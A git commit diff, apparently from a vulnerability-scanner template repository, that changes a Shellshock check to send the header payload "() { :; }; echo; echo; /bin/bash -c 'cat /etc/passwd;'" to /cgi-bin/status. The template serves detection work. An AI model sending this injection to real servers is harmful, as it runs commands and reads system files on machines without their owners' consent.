Improve shellshock payload

patch-1
Aron Molnar 2020-08-06 10:03:58 +02:00 committed by GitHub
parent 86c124a3ae
commit f4ebffa1bc
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 1 additions and 1 deletions

View File

@ -8,7 +8,7 @@ info:
requests: requests:
- method: GET - method: GET
headers: headers:
User-Agent: "{ :;}; echo $(</etc/passwd)" User-Agent: "() { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd;'"
path: path:
- "{{BaseURL}}/cgi-bin/status" - "{{BaseURL}}/cgi-bin/status"
matchers: matchers: